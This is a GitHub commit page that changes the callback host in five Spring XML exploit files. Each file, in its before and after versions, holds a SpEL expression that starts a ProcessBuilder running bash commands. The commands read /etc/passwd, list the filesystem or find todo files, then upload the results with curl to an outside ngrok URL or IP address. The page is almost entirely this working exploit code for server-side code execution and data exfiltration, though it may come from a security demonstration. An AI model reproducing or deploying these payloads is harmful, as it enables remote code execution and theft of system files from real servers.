Skip to content

Commit

Permalink
reset spel urls
Browse files Browse the repository at this point in the history
  • Loading branch information
sjmaple committed Nov 5, 2018
1 parent c651cdc commit 5d0cb58
Show file tree
Hide file tree
Showing 5 changed files with 5 additions and 5 deletions.
2 changes: 1 addition & 1 deletion exploits/spel-etc-pwd.xml
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
<list>
<value>bash</value>
<value>-c</value>
<value>curl -0 -m 1 -F data=@/etc/passwd https://9a74a06a.ngrok.io</value>
<value>curl -0 -m 1 -F data=@/etc/passwd http://34.205.135.170</value>
</list>
</constructor-arg>
<property name="test" value="#{pb.start()}"/>
Expand Down
2 changes: 1 addition & 1 deletion exploits/spel-find-todo-files.xml
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
<list>
<value>bash</value>
<value>-c</value>
<value>find . -iname '*todo*' > /tmp/1.txt; curl -0 -m 3 -F data=@/tmp/1.txt https://9a74a06a.ngrok.io</value>
<value>find . -iname '*todo*' > /tmp/1.txt; curl -0 -m 3 -F data=@/tmp/1.txt http://34.205.135.170</value>
</list>
</constructor-arg>
<property name="test" value="#{pb.start()}"/>
Expand Down
2 changes: 1 addition & 1 deletion exploits/spel-find.xml
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
<list>
<value>bash</value>
<value>-c</value>
<value>find . > /tmp/1.txt; curl -0 -m 3 -F data=@/tmp/1.txt https://9a74a06a.ngrok.io</value>
<value>find . > /tmp/1.txt; curl -0 -m 3 -F data=@/tmp/1.txt http://34.205.135.170</value>
</list>
</constructor-arg>
<property name="test" value="#{pb.start()}"/>
Expand Down
2 changes: 1 addition & 1 deletion exploits/spel-list-tmp.xml
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
<list>
<value>bash</value>
<value>-c</value>
<value>ls -laR /tmp > /tmp/listtmp.txt; curl -0 -m 1 --data-binary @/tmp/listtmp.txt https://9a74a06a.ngrok.io</value>
<value>ls -laR /tmp > /tmp/listtmp.txt; curl -0 -m 1 --data-binary @/tmp/listtmp.txt http://34.205.135.170</value>
</list>
</constructor-arg>
<property name="test" value="#{pb.start()}"/>
Expand Down
2 changes: 1 addition & 1 deletion exploits/spel.xml
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
<list>
<value>bash</value>
<value>-c</value>
<value>find . > /tmp/1.txt;curl -0 -m 1 -F data=@/tmp/1.txt https://9a74a06a.ngrok.io > /tmp/curl.log</value>
<value>find . > /tmp/1.txt;curl -0 -m 1 -F data=@/tmp/1.txt http://34.205.135.170 > /tmp/curl.log</value>
</list>
</constructor-arg>
<property name="test" value="#{pb.start()}"/>
Expand Down

0 comments on commit 5d0cb58

Please sign in to comment.